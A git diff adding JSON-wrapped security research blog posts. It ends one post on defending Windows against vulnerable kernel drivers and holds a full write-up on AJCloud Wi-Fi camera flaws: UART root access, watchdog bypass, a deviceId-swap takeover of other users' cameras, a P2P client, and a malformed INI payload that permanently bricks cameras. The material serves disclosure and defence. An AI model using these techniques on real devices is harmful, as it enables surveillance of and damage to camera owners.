common](https://www.welivesecurity.com/2022/01/11/signed-kernel-drivers-unguarded-gateway-windows-core/) flaws include granting user mode processes write access to virtual memory, physical memory, or [model-specific registers](https://en.wikipedia.org/wiki/Model-specific_register) (MSR). Classic buffer overflows and missing bounds checks are also common.\n\nA less common driver flaw is unrestricted [handle duplication](https://www.unknowncheats.me/forum/anti-cheat-bypass/312732-physmeme-handle-device-physicalmemory-door-kernel-land-bypasses.html#post2315458). While this may seem like innocuous functionality at first glance, handle duplication can be leveraged to gain full kernel code execution by user mode processes. For example, the latest [Process Explorer](https://docs.microsoft.com/en-us/sysinternals/downloads/process-explorer) driver by Microsoft exposes [such a function](https://github.com/Yaxser/Backstab).\n\nAn attacker can leverage this vulnerability to duplicate a [sensitive handle](https://www.unknowncheats.me/forum/anti-cheat-bypass/312732-physmeme-handle-device-physicalmemory-door-kernel-land-bypasses.html#post2315458) to raw physical memory present in the System (PID 4) process.\n\n\n\nAfter obtaining [the cr3 value](http://publications.alex-ionescu.com/Recon/ReconBru%202017%20-%20Getting%20Physical%20with%20USB%20Type-C,%20Windows%2010%20RAM%20Forensics%20and%20UEFI%20Attacks.pdf), the attacker can walk the page tables to convert virtual kernel addresses to their associated physical addresses. This grants an arbitrary virtual read/write primitive, which attackers can leverage to easily tamper with kernel data structures or execute arbitrary kernel code. On HVCI-enabled systems, thread control flow can be hijacked to execute arbitrary kernel functions as shown below.\n\n\n\nWe reported this issue to Microsoft in the vulnerable driver [submission portal](https://www.microsoft.com/en-us/wdsi/driversubmission) on July 26, but as of this writing have not received a response. We hope Microsoft will consider this a serious security issue worth addressing. Ideally, they will release a fixed version without the vulnerable [IOCTLs](https://docs.microsoft.com/en-us/windows/win32/devio/device-input-and-output-control-ioctl-) and include it in the default HVCI blocklist. This would be consistent with the [blocking](https://github.com/MicrosoftDocs/windows-itpro-docs/blob/ce56a2f15015e07bf35cd05ce3299340d16e759a/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules.md?plain=1#L391) of the ProcessHacker (now known as [System Informer](https://github.com/winsiderss/systeminformer)) driver for the [same flaw.](https://www.unknowncheats.me/forum/downloads.php?do=file&id=25441)\n\n## Blocklisting\n\nBlocklisting prevents known vulnerable drivers from loading on a system, and is a great first step to the vulnerable driver problem. Blocklisting can raise the cost of kernel attacks to levels out of reach for some criminal groups, while maintaining low false positive rates. The downside is it does not stop more [advanced groups](https://decoded.avast.io/janvojtesek/the-return-of-candiru-zero-days-in-the-middle-east/), which can identify new, previously-unknown, vulnerable drivers.\n\nMicrosoft maintains a [catalog](https://github.com/MicrosoftDocs/windows-itpro-docs/blob/public/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules.md) of known exploited or malicious drivers, which should be a minimum baseline. This catalog consists of rules using various combinations of [Authenticode](https://reversea.me/index.php/authenticode-i-understanding-windows-authenticode/) hash, certificate hash (also known as [TBS](https://www.rfc-editor.org/rfc/rfc5280#section-4.1)), internal file name, and version. The catalog is intended to be used by Windows Defender Application Control ([WDAC](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/wdac-and-applocker-overview)). We used this catalog as a starting point for a more comprehensive list using the [YARA](https://virustotal.github.io/yara/) community standard.\n\nTo expand on the existing list of known vulnerable drivers, we pivoted through VirusTotal data with known vulnerable import hashes and other metadata. We also combed through public attack tooling to identify additional vulnerable drivers. As common practice for Elastic Security, we made our [blocklist](https://github.com/elastic/protections-artifacts/search?q=VulnDriver) available to the community. In Elastic [Endpoint Security](https://www.elastic.co/security/endpoint-security) version 8.3 and newer, all drivers are validated against the blocklist in-line before they are allowed to load onto the system (shown below).\n\n\n\n## Allowlisting\n\nOne of the most robust defenses against this driver threat is to only allow the combination of driver signer, internal file name, version, and/or hashes, which are known to be in use. We recommend organizations be as strict as feasible. For example, do not blanket trust all [WHQL](https://docs.microsoft.com/en-us/windows-hardware/drivers/install/whql-test-signature-program) signed drivers. This is the classic application control method, albeit focusing on drivers. An organization’s diversity of drivers should be more manageable than the entirety of user mode applications. Windows Defender Application Control ([WDAC](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/wdac-and-applocker-overview)) is a powerful built-in feature that can be configured this way. However, the learning curve and maintenance costs may still be too high for organizations without well-staffed security teams. To reap most of the benefits of the allowlisting approach, but reduce the cost of implementation to the users (ideally to blocklisting levels), we recommend two approaches in tandem: behavior control and alert on first seen.\n\n## Behavior control\n\nThe concept behind behavior control is to produce a more manageable set of allowlistable behavior choke points that can be tuned for high confidence. For example, we can create a behavior control around which applications are allowed to write drivers to disk. This may start with a relatively loose and simple rule:\n\n\n\nFrom there, we can allowlist the benign applications that are known to exhibit this behavior. Then we receive and triage hits, tune the rule until it becomes high confidence, and then ship as part of our [malicious behavior protection](https://www.elastic.co/blog/whats-new-elastic-security-7-15-0). Elastic SIEM users can use the same technique to [create custom](https://www.elastic.co/guide/en/security/current/rules-ui-create.html) Detection Engine [rules](https://github.com/elastic/detection-rules) tuned specifically for their environment.\n\n## First seen\n\nElastic Security in 8.4 adds another powerful tool that can be used to identify suspicious drivers. This is the [“New Terms” rule type](https://www.elastic.co/guide/en/security/8.4/rules-ui-create.html#create-new-terms-rule), which can be used to create an alert when a term (driver hash, signer, version, internal file name, etc) is observed for the first time.\n\n\n\nThis empowers security teams to quickly surface unusual drivers the first time they’re seen in their environment. This supports a detection opportunity for even previously unknown vulnerable drivers or other driver-based adversary tradecraft.\n\n\n\n## Conclusion\n\nVulnerable driver exploitation, once relegated to advanced adversaries, has now proliferated to the point of being used in ransomware attacks. The time for the security community to come together and act on this problem is now. We can start raising the cost by collaborating on blocklists as a community. We should also investigate additional detection strategies such as behavior control and anomaly detection to raise the cost further without requiring significant security expertise or resources to achieve.\n"
+ },
+ "title": "Stopping Vulnerable Driver Attacks",
+ "slug": "stopping-vulnerable-driver-attacks",
+ "subtitle": "Using vulnerable drivers to gain kernel mode execution.",
+ "date": "2023-03-01",
+ "description": "This post includes a primer on kernel mode attacks, along with Elastic’s recommendations for securing users from kernel attacks leveraging vulnerable drivers.",
+ "author": [
+ {
+ "slug": "joe-desimone"
+ }
+ ],
+ "image": "blog-thumb-clock-gears.jpg",
+ "category": [
+ {
+ "slug": "security-operations"
+ },
+ {
+ "slug": "detection-science"
+ }
+ ]
+ },
+ "id": "security_labs_content-stopping_vulnerable_driver_attacks-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-storm_on_the_horizon-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-storm_on_the_horizon-md.json
new file mode 100644
index 00000000000..c3c218e0df1
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-storm_on_the_horizon-md.json
@@ -0,0 +1,34 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Storm on the Horizon: Inside the AJCloud IoT Ecosystem\"\nslug: \"storm-on-the-horizon\"\ndate: \"2024-09-20\"\ndescription: \"Wi-Fi cameras are popular due to their affordability and convenience but often have security vulnerabilities that can be exploited.\"\nauthor:\n - slug: mark-mager\n - slug: eric-forte\nimage: \"storm-on-the-horizon.jpg\"\ncategory:\n - slug: security-research\n - slug: perspectives\ntags:\n - iot\n - defcon\n---\n\n## Introduction\n\nWi-Fi cameras are some of the most common IoT devices found in households, businesses, and other public spaces. They tend to be quite affordable and provide users with easy access to a live video stream on their mobile device from anywhere on the planet. As is often the case with IoT devices, security tends to be overlooked in these cameras, leaving them open to critical vulnerabilities. If exploited, these vulnerabilities can lead to devastating effects on the cameras and the networks within which they’re deployed. They can lead to the compromise of the sensitive PII of their users.\n\nA recent [Elastic ON Week](https://www.youtube.com/watch?v=qoojLdKJvkc) afforded us the opportunity to explore the attack surface of these types of devices to gain a deeper understanding of how they are being compromised. We focused primarily on performing vulnerability research on the [Wansview Q5](https://www.amazon.com/Wireless-Security-Wansview-Detection-Compatible/dp/B07QKXM2D3?th=1) (along with the nearly identical [Q6](https://www.wansview.com/q6)), one of the more popular and affordable cameras sold on Amazon. Wansview is a provider of security products based in Shenzhen, China, and one of Amazon's more prominent distributors of Wi-Fi cameras.\n\n\n\nThe Q5 offers the same basic feature set seen in most cameras:\n\n* Pan / tilt / zoom\n* Night vision\n* Two-way audio\n* Video recording to SD card\n* Integration with Smart Home AI assistants (e.g. Alexa)\n* ONVIF for interoperability with other security products\n* RTSP for direct access to video feed within LAN\n* Automated firmware updates from the cloud\n* Remote technical support\n* Shared device access with other accounts\n* Optional monthly subscription for cloud storage and motion detection\n\nLike most other Wi-Fi cameras, these models require an active connection to their vendor cloud infrastructure for basic operation; without access to the Internet, they simply will not operate. Before a camera can go live, it must be paired to a [registered user account](https://www.youtube.com/watch?v=UiF7xKnXfC0) via Wansview’s official mobile app and a standard [QR code-based setup process](https://youtu.be/PLMNKoO1214?si=G8sYxT3EagE3u_cw). Once this process is complete, the camera will be fully online and operational.\n\n## AJCloud: A Brief Introduction\n\nThough Wansview has been in operation [since 2009](https://www.wansview.com/about_company), at the moment they primarily appear to be a reseller of camera products built by a separate company based in Nanjing, China: [AJCloud](https://www.ajcloud.net).\n\n\n\nAJCloud provides vendors with access to manufactured security devices, the necessary firmware, mobile and desktop user applications, the cloud management platform, and services that connect everything together. Since AJCloud was founded in 2018, they have partnered with several vendors, both large and small, including but not limited to the following:\n\n* [Wansview](https://www.wansview.com)\n* [Cinnado](https://cinnado.com)\n* [Galayou](https://www.amazon.com/stores/GALAYOU/page/789538ED-82AC-43AF-B676-6622577A1982?ref_=ast_bln&store_ref=bl_ast_dp_brandLogo_sto)\n* [Faleemi](https://www.faleemi.com)\n* [Philips](https://www.philips.com)\n* [Septekon](https://www.septekon.com)\n* [Smarteye](https://www.smarteyegroup.com)\n* [Homeguard](http://www.homeguardworld.com)\n* [iPupPee](https://ipuppee.com)\n\nA cursory review of mobile and desktop applications developed and published by AJCloud on [Google Play](https://play.google.com/store/apps/developer?id=AJCLOUD+INTERNATIONAL+INC.&hl=en_US), [Apple’s App Store](https://apps.apple.com/us/developer/ajcloud-labs-inc/id1396464400), and the [Microsoft Store](https://apps.microsoft.com/search/publisher?name=%E5%8D%97%E4%BA%AC%E5%AE%89%E5%B1%85%E4%BA%91%E4%BF%A1%E6%81%AF%E6%8A%80%E6%9C%AF%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8&hl=en-us&gl=US) reveals their ties to each of these vendors. Besides superficial company branding, these applications are identical in form and function, and they all require connectivity with the AJCloud management platform.\n\n\n\nAs for the cameras, it is apparent that these vendors are selling similar models with only minor modifications to the camera housing and underlying hardware.\n\n\n\n\n\nThe resemblance between the [Faleemi 886](https://www.faleemi.com/product/fsc886/) and the [Wansview Q6 (1080p)](https://www.youtube.com/watch?v=X5P5fGhRxAs) is obvious\n\nReusing hardware manufacturing and software development resources likely helps to control costs and simplify logistics for AJCloud and its resellers. However, this streamlining of assets also means that security vulnerabilities discovered in one camera model would likely permeate all products associated with AJCloud.\n\nDespite its critical role in bringing these devices to consumers, AJCloud has a relatively low public profile. However, IPVM researchers recently [published](https://ipvm.com/reports/ajcloud-wansview-leak) research on a significant vulnerability (which has since been resolved) in AJCloud’s GitLab repository. This vulnerability would allow any user to access source code, credentials, certificates, and other sensitive data without requiring authentication.\n\nThough total sales figures are difficult to derive for Wansview and other vendors in the Wi-Fi camera space, IPVM estimated that at least one million devices were connected to the AJCloud platform at the time of publication of their report. As camera sales [continue to soar](https://www.statista.com/forecasts/1301193/worldwide-smart-security-camera-homes) into the hundreds of millions, it is safe to assume that more of AJCloud’s devices will be connected in homes across the world for years to come.\n\n## Initial Vulnerability Research Efforts\n\nTo gain a deeper understanding of the security posture of the Wansview Q5, we attacked it from multiple angles:\n\n\n\nAt first, our efforts were primarily focused on active and passive network reconnaissance of the camera and the [Android version](https://play.google.com/store/apps/details?id=net.ajcloud.wansviewplus&hl=en_US) of Wansview Cloud, Wansview’s official mobile app. We scanned for open ports, eavesdropped on network communications through man-in-the-middle (MitM) attacks, attempted to coerce unpredictable behavior from the cameras through intentional misconfiguration in the app, and disrupted the operation of the cameras by abusing the QR code format and physically interacting with the camera. The devices and their infrastructure were surprisingly resilient to these types of surface-level attacks, and our initial efforts yielded few noteworthy successes.\n\nWe were particularly surprised by our lack of success intercepting network communications on both the camera and the app. We repeatedly encountered robust security features (e.g., certificate pinning, app and OS version restrictions, and properly secured TLS connections) that disrupted our attempts.\n\n\n\nReverse engineering tools allowed us to analyze the APK much more closely, though the complexity of the code obfuscation observed within the decompiled Java source code would require an extended length of time to fully piece together.\n\nOur limited initial success would require us to explore further options that would provide us with more nuanced insight into the Q5 and how it operates.\n\n## Initial Hardware Hacking\n\nTo gain more insight into how the camera functioned, we decided to take a closer look at the camera firmware. While some firmware packages are available online, we wanted to take a look at the code directly and be able to monitor it and the resulting logs while the camera was running. To do this, we first took a look at the hardware diagram for the system on a chip (SoC) to see if there were any hardware avenues we might be able to leverage. The Wansview Q5 uses a [Ingenic Xburst T31 SoC](https://www.cnx-software.com/2020/04/26/ingenic-t31-ai-video-processor-combines-xburst-1-mips-and-risc-v-lite-cores/), its system block diagram is depicted below.\n\n\n\nOne avenue that stood out to us was the I2Cx3/UARTx2/SPIx2 SPI I/O block. If accessible, these I/O blocks often provide log output interfaces and/or shell interfaces, which can be used for debugging and interacting with the SoC. Appearing promising, we then performed a hardware teardown of the camera and found what appeared to be a UART serial interface to the SoC, shown below.\n\n\n\nNext, we connected a logic analyzer to see what protocol was being used over these pins, and when decoded, the signal was indeed UART.\n\n\n\nNow that we can access an exposed UART interface, we then looked to establish a shell connection to the SoC via UART. There are a number of different software mechanisms to do this, but for our purposes we used the Unix utility `screen` with the detected baud rate from the logic analyzer. \n\n\n\nUpon opening and monitoring the boot sequence, we discovered that secure boot was not enabled despite being supported by the SoC. We then proceeded to modify the configuration to boot into single user mode providing a root shell for us to use to examine the firmware before the initialization processes were performed, shown below. \n\n\n\nOnce in single-user mode, we were able to pull the firmware files for static analysis using the `binwalk` utility, as shown below. \n\n\n\nAt this stage, the filesystem is generally read-only; however, we wanted to be able to make edits and instantiate only specific parts of the firmware initialization as needed, so we did some quick setups for additional persistence beyond single-user mode access. This can be done in a number of ways, but there are two primary methods one may wish to use. Generally speaking, in both approaches, one will want to make as few modifications to the existing configuration as possible. This is generally preferred when running dynamic analysis if possible, as we have had the least impact on the run time environment. One method we used for this approach is to make a `tmpfs` partition for read/write access in memory and mount it via `fstab`. In our case `fstab` was already considered in such a way that supported this, and as such made it a very minimal change. See the commands and results for this approach below.\n\n\n\nAnother method is to pull existing user credentials and attempt to use these to log in. This approach was also successful. The password hash for the root user can be found in the `etc/passwd` file and decrypted using a tool like John the Ripper. In our above examples, we were transferring data and files entirely over the serial connection. The camera also has an available SD card slot that can be mounted and used to transfer files. Going forward, we will be using the SD card or local network for moving files as the bandwidth makes for faster and easier transfer; however, serial can still be used for all communications for the hardware setup and debugging if preferred.\n\nNow, we have root level access to the camera providing access to the firmware and dmesg logs while the software is running. Using both the firmware and logs as reference, we then looked to further examine the user interfaces for the camera to see if there was a good entry point we could use to gain further insight.\n\n## Wansview Cloud for Windows\n\nAfter the mobile apps proved to be more secure than we had originally anticipated, we shifted our focus to an older version of the Wansview Cloud application built for Windows 7. This app, which is still [available for download](https://www.wansview.com/support_download), would provide us with direct insight into the network communications involved with cameras connected to the AJCloud platform.\n\nThanks in large part to overindulgent debug logging on behalf of the developers, the Windows app spills out its secrets with reckless abandon seldom seen in commercial software. The first sign that things are amiss is that user login credentials are logged in cleartext.\n\n\n\nReverse engineering the main executable and DLLs (which are not packed, unlike the Wansview Cloud APK) was expedited thanks to the frequent use of verbose log messages containing unique strings. Identifying references to specific files and lines within its underlying codebase helped us to quickly map out core components of the application and establish the high level control flow.\n\nNetwork communications, which were difficult for us to intercept on Android, are still transmitted over TLS, though they are conveniently logged to disk in cleartext. With full access to all HTTP POST request and response data (which is packed into JSON objects), there was no further need to pursue MitM attacks on the application side. \n\n\n\n\n\nWithin the POST responses, we found sensitive metadata including links to publicly accessible screen captures along with information about the camera’s location, network configuration, and its firmware version.\n\n\n\n\n\nAfter documenting all POST requests and responses found within the log data, we began to experiment with manipulating different fields in each request in an attempt to access data not associated with our camera or account. We would eventually utilize a debugger to change the deviceId to that of a target camera not paired with the current logged in account. A camera deviceId doubles as its serial number and can be found printed on a sticker label located on either the back or bottom of a camera.\n\n\n\nWe found the most appropriate target for our attack in a code section where the deviceId is first transmitted in a POST request to [https://sdc-us.ajcloud.net/api/v1/dev-config](https://sdc-us.ajcloud.net/api/v1/dev-config):\n\n\n\nOur plan was to set a breakpoint at the instruction highlighted in the screenshot above, swap out the deviceId within memory, and then allow the app to resume execution.\n\nAmazingly enough, this naive approach not only worked to retrieve sensitive data stored in the AJCloud platform associated with the target camera and the account it is tied to, but it also connected us to the camera itself. This allowed us to access its video and audio streams and remotely control it through the app as if it were our own camera.\n\nThrough exploiting this vulnerability and testing against multiple models from various vendors, we determined that all devices connected to the AJCloud platform could be remotely accessed and controlled in this manner. We wrote a [PoC exploit script](https://github.com/elastic/camera-hacks/blob/main/windows/win_exploit.py) to automate this process and effectively demonstrate the ease with which this access control vulnerability within AJCloud’s infrastructure can be trivially exploited.\n\n## Exploring the network communications\n\nThough we were able to build and reliably trigger an exploit against a critical vulnerability in the AJCloud platform, we would need to dig further in order to gain a better understanding of the inner workings of the apps, the camera firmware, and the cloud infrastructure.\n\nAs we explored beyond the POST requests and responses observed throughout the sign-in process, we noticed a plethora of UDP requests and responses from a wide assortment of IPs. Little in the way of discernible plaintext data could be found throughout these communications, and the target UDP port numbers for the outbound requests seemed to vary. Further investigation would later reveal that this UDP activity was indicative of PPPP, an IoT peer-to-peer (P2P) protocol that was analyzed and demonstrated extensively by Paul Marrapesse during his [presentation at DEF CON 28](https://youtu.be/Z_gKEF76oMM?si=cqCBU6iPxCyEm-xm). We would later conclude that the way in which we exploited the vulnerability we discovered was facilitated through modified P2P requests, which led us to further explore the critical role that P2P plays in the AJCloud platform.\n\n\n\nThe main purpose of P2P is to facilitate communication between applications and IoT devices, regardless of the network configurations involved. P2P primarily utilizes an approach based around [UDP hole punching](https://en.wikipedia.org/wiki/UDP_hole_punching) to create temporary communication pathways that allow requests to reach their target either directly or through a relay server located in a more accessible network environment. The core set of P2P commands integrated into AJCloud’s apps provides access to video and audio streams as well as the microphone and pan/tilt/zoom.\n\n## Advanced Hardware Hacking\n\nWith our additional understanding of the P2P communications, it was now time to examine the camera itself more closely during these P2P conversations, including running the camera software in a debugger. To start, we set up the camera with a live logging output via the UART serial connection that we established earlier, shown below.\n\n\n\nThis provided a live look at the log messages from the applications as well as any additional logging sources we needed. From this information, we identified the primary binary that is used to establish communication between the camera and the cloud as well as providing the interfaces to access the camera via P2P. \n\nThis binary is locally called initApp, and it runs once the camera has been fully initialized and the boot sequence is completed. Given this, we set out to run this binary with a debugger to better evaluate the local functions. In attempting to do so, we encountered a kernel watchdog that detected when initApp was not running and would forcibly restart the camera if it detected a problem. This watchdog checks for writes to `/dev/watchdog` and, if these writes cease, will trigger a timer that will reboot the camera if the writes do not resume. This makes debugging more difficult as when one pauses the execution of initApp, the writes to the watchdog pause as well. An example of this stopping behavior is shown below:\n\n\n\nTo avoid this, one could simply try writing to the watchdog whenever initApp stops to prevent the reboot. However, another cleaner option is to make use of the magic close feature of the [Linux Kernel Watchdog Driver API](https://www.kernel.org/doc/Documentation/watchdog/watchdog-api.txt). In short, if one writes a specific magic character ‘V’ `/dev/watchdog` the watchdog will be disabled. There are other methods of defeating the watchdog as well, but this was the one we chose for our research as it makes it easy to enable and disable the watchdog at will.\n\nWith the watchdog disabled, setting up to debug initApp is fairly straightforward. We wanted to run the code directly on the camera, if possible, instead of using an emulator. The architecture of the camera is Little Endian MIPS (MIPSEL). We were fortunate that pre-built GDB and GDBServer binaries were able to function without modification; however, we did not know this initially, so we also set up a toolchain to compile GDBServer specifically for the camera. One technique that might be useful if you find yourself in a similar situation is to use a compilation tool like gcc to compile some source code to your suspected target architecture and see if it runs; see the example below.\n\n\n\nIn our case, since our SoC was known to us, we were fairly certain of the target architecture; however, in certain situations, this may not be so simple to discover, and working from hello world binaries can be useful to establish an initial understanding. Once we were able to compile binaries, we then compiled GDBServer for our camera and then used it to attach and launch initApp. Then, we connected to it from another computer on the same local network as the camera. An example of this is shown below:\n\n\n\nAs a note for the above example, we are using the `-x` parameter to pass in some commands for convenience, but they are not necessary for debugging. For more information on any of the files or commands, please see our [elastic/camera-hacks](https://github.com/elastic/camera-hacks/tree/main) GitHub repo. In order for initApp to load properly, we also needed to ensure that the libraries used by the binary were accessible via the `PATH` and `LD_LIBARY_PATH` environment variables. With this setup, we were then able to debug the binary as we needed. Since we also used the magic character method of defeating the watchdog earlier we also will need to make sure to control instances where the watchdog can be re-enabled. In most cases, we do not want this to happen. As such, we overwrote the watchdog calls in initApp so that the watchdog would not be re-enabled while we were debugging, as shown below.\n\n\n\nThe following video shows the full setup process from boot to running GDBServer. In the video, we also start a new initApp process, and as such, we need to kill both the original process and the `daemon.sh` shell script that will spawn a new initApp process if it is killed.\n\n\n\n## Building a P2P Client\n\nIn order to further explore the full extent of capabilities which P2P provides to AJCloud IoT devices and how they can be abused by attackers, we set out to build our own standalone client. This approach would remove the overhead of manipulating the Wansview Cloud Windows app while allowing us to more rapidly connect to cameras and test out commands we derive from reverse engineering the firmware.\n\nFrom the configuration data we obtained earlier from the Windows app logs, we knew that a client issues requests to up to three different servers as part of the connection process. These servers provide instructions to clients as to where traffic should be routed in order to access a given camera. If you would like to discover more of these servers out in the open, you can scan the Internet using the following four-byte UDP payload on port `60722`. Paul Marrapese used this technique to great effect as part of his research.\n\n\n\n\n\nIn order to properly establish a P2P connection, a client must first send a simple hello message (`MSG_HELLO`), which needs to be ACK’d (`MSG_HELLO_ACK`) by a peer-to-peer server. The client then queries the server (`MSG_P2P_REQ`) for a particular deviceId. If the server is aware of that device, then it will respond (`MSG_PUNCH_TO`) to the client with a target IP address and UDP port number pair. The client will then attempt to connect (`MSG_PUNCH_PKT`) to the IP and port pair along with other ports [within a predetermined range](https://github.com/elastic/camera-hacks/blob/deb2abe9a7a1009c5c1b7d34584f143d5b62c82e/p2p/p2p_client.py#L247-L260) as part of a [UDP hole punching](https://en.wikipedia.org/wiki/UDP_hole_punching) routine. If successful, the target will send a message (`MSG_PUNCH_PKT`) back to the client along with a final message (`MSG_P2P_RDY`) to confirm that the connection has been established.\n\n\n\nAfter connecting to a camera, we are primarily interested in sending different `MSG_DRW` packets and observing their behavior. These packets contain commands which will allow us to physically manipulate the camera, view and listen to its video and audio streams, access data stored within it, or alter its configuration. The most straightforward command we started with involved panning the camera counter clockwise, which we could easily identify as a single message transmission.\n\n\n\nDebug log messages on the camera allowed us to easily locate where this command was processed within the firmware.\n\n\n\nLocating the source of this particular message placed us in the main routine which handles processing MSG_DRW messages, which provided us with critical insight into how this command is invoked and what other commands are supported by the firmware.\n\n\n\nExtensive reverse engineering and testing allowed us to build a [PoC P2P client](https://github.com/elastic/camera-hacks/blob/main/p2p/p2p_client.py) which allows users to connect to any camera on the AJCloud platform, provided they have access to its deviceId. Basic commands supported by the client include camera panning and tilting, rebooting, resetting, playing audio clips, and even crashing the firmware.\n\nThe most dangerous capability we were able to implement was through a command which modifies a core device configuration file: `/var/syscfg/config_default/app_ajy_sn.ini`. On our test camera, the file’s contents were originally as follows:\n\n```\n[common]\nproduct_name=Q5\nmodel=NAV\nvendor=WVC\nserialnum=WVCD7HUJWJNXEKXF\nmacaddress=\nwifimacaddress=\n```\n\nWhile this appears to contain basic device metadata, this file is the only means through which the camera knows how to identify itself. Upon startup, the camera reads in the contents of this file and then attempts to connect to the AJCloud platform through a series of curl requests to various API endpoints. These curl requests pass along the product name, camera model, vendor code, and serial number values extracted from the INI file as query string arguments. We used our client to deliver a message which overwrites the contents like so:\n\n```\n[common]\nproduct_name=\nmodel=OPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~HH01\nvendor=YZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~HH01\nserialnum=defghijklmnopqrstuvwxyz{|}~HH01\nmacaddress=\nwifimacaddress=\n```\n\nAfter the camera is reset, all curl requests issued to AJCloud platform API endpoints as part of the startup routine will fail due to the malformed data contained within the INI file. These requests will continue to periodically be sent, but they will never succeed and the camera will remain inactive and inaccessible through any apps. Unfortunately, there is no simple way to restore the previous file contents through resetting the camera, updating its firmware, or restoring the factory settings. File modifications carried out through this command will effectively brick a camera and render it useless.\n\n\n\nTaking a closer look at the decompiled function (`syscfg_setAjySnParams`) which overwrites the values stored in `app_ajy_sn.ini`, we can see that input parameters, extracted from the `MSG_DRW` command are used to pass along string data which will be used to overwrite the model, vendor, and serial number fields in the file. memset is used to overwrite three global variables, intended to store these input strings, with null bytes. strcpy is then used to transfer the input parameters into these globals. In each instance, this will result in bytes being copied directly from the `MSG_DRW` command buffer until it encounters a null character.\n\n\n\nBecause no validation is enforced on the length of these input parameters extracted from the command, it is trivial to craft a message of sufficient length which will trigger a buffer overflow. While we did not leverage this vulnerability as part of our attack to brick the camera, this appears to be an instance where an exploit could be developed which would allow for an attacker to achieve remote code execution on the camera.\n\n## Impact\n\nWe have confirmed that a broad range of devices across several vendors affiliated with AJCloud and several different firmware versions are affected by these vulnerabilities and flaws. Overall, we successfully demonstrated our attacks against fifteen different camera products from Wansview, Galayou, Cinnado, and Faleemi. Based on our findings, it is safe to assume that all devices which operate AJCloud firmware and connect to the AJCloud platform are affected.\n\nAll attempts to contact both AJCloud and Wansview in order to disclose these vulnerabilities and flaws were unsuccessful.\n\n## What did the vendors do right?\n\nDespite the vulnerabilities we discovered and discussed previously, there are a number of the security controls that AJCloud and the camera vendors implemented well. For such a low cost device, many best practices were implemented. First, the network communications are secured well using certificate based WebSocket authentication. In addition to adding encryption, putting many of the API endpoints behind the certificate auth makes man in the middle attacks significantly more challenging. Furthermore, the APKs for the mobile apps were signed and obfuscated making manipulating these apps very time consuming. \n\nAdditionally, the vendors also made some sound decisions with the camera hardware and firmware. The local OS for the camera is effectively limited, focusing on just the needed functionality for their product. The file system is configured to be read only, outside of logging, and the kernel watchdog is an effective method of ensuring uptime and reducing risk of being stuck in a failed state. The Ingenic Xburst T31 SoC, provides a capable platform with a wide range of support including secure boot, a Power-On Reset (POR) watchdog, and a separate RISC-V processor capable of running some rudimentary machine learning on the camera input.\n\n## What did the vendors do wrong?\n\nUnfortunately, there were a number of missed opportunities with these available features. Potentially the most egregious is the unauthenticated cloud access. Given the API access controls established for many of the endpoints, having the camera user access endpoints available via serial number without authentication is a huge and avoidable misstep. The P2P protocol is also vulnerable as we showcased, but compared to the API access which should be immediately fixable, this may take some more time to fix the protocol. It is a very dangerous vulnerability, but it is a little bit more understandable as it requires considerably more time investment to both discover and fix. \n\nFrom the application side, the primary issue is with the Windows app which has extensive debug logging which should have been removed before releasing publicly. As for the hardware, it can be easily manipulated with physical access (exposed reset button, etc.). This is not so much an issue given the target consumer audience. It is expected to err on the side of usability rather than security, especially given physical access to the device. On a similar note, secure boot should be enabled, especially given that the T31 SoC supports it. While not strictly necessary, this would make it much harder to debug the source code and firmware of the device directly, making it more difficult to discover vulnerabilities that may be present. Ideally it would be implemented in such a way that the bootloader could still load an unsigned OS to allow for easier tinkering and development, but would prevent the signed OS from loading until the boot loader configuration is restored. However, one significant flaw in the current firmware is the dependence on the original serial number that is not stored in a read only mount point while the system is running. Manipulating the serial number should not permanently brick the device. It should either have a mechanism for requesting a new serial number (or restoring its original serial number) should its serial number be overwritten, or the serial number should be immutable. \n\n## Mitigations\n\nCertain steps can be taken in order to reduce the attack surface and limit potential adverse effects in the event of an attack, though they vary in their effectiveness.\n\nSegmenting Wi-Fi cameras and other IoT devices off from the rest of your network is a highly recommended countermeasure which will prevent attackers from pivoting laterally to more critical systems. However, this approach does not prevent an attacker from obtaining sensitive user data through exploiting the access control vulnerability we discovered in the AJCloud platform. Also, considering the ease in which we were able to demonstrate how cameras could be accessed and manipulated remotely via P2P, any device connected to the AJCloud platform is still at significant risk of compromise regardless of its local network configuration.\n\nRestricting all network communications to and from these cameras would not be feasible due to how essential connectivity to the AJCloud platform is to their operation. As previously mentioned, the devices will simply not operate if they are unable to connect to various API endpoints upon startup.\n\nA viable approach could be restricting communications beyond the initial startup routine. However, this would prevent remote access and control via mobile and desktop apps, which would defeat the entire purpose of these cameras in the first place. For further research in this area, please refer to “[Blocking Without Breaking: Identification and Mitigation of Non-Essential IoT Traffic](https://petsymposium.org/popets/2021/popets-2021-0075.pdf)”, which explored this approach more in-depth across a myriad of IoT devices and vendors.\n\nThe best approach to securing any Wi-Fi camera, regardless of vendor, while maintaining core functionality would be to flash it with alternative open source firmware such as [OpenIPC](https://openipc.org) or [thingino](https://thingino.com). Switching to open source firmware avoids the headaches associated with forced connectivity to vendor cloud platforms by providing users with fine grain control of device configuration and remote network accessibility. Open access to the firmware source helps to ensure that critical flaws and vulnerabilities are quickly identified and patched by diligent project contributors.\n\n## Key Takeaways\n\nOur research revealed several critical vulnerabilities that span all aspects of cameras operating AJCloud firmware which are connected to their platform. Significant flaws in access control management on their platform and the PPPP peer protocol provides an expansive attack surface which affects millions of active devices across the world. Exploiting these flaws and vulnerabilities leads to the exposure of sensitive user data and provides attackers with full remote control of any camera connected to the AJCloud platform. Furthermore, a built-in P2P command, which intentionally provides arbitrary write access to a key configuration file, can be leveraged to either permanently disable cameras or facilitate remote code execution through triggering a buffer overflow.\n\nPlease visit our [GitHub repository](https://github.com/elastic/camera-hacks) for custom tools and scripts we have built along with data and notes we have captured which we felt would provide the most benefit to the security research community.\n"
+ },
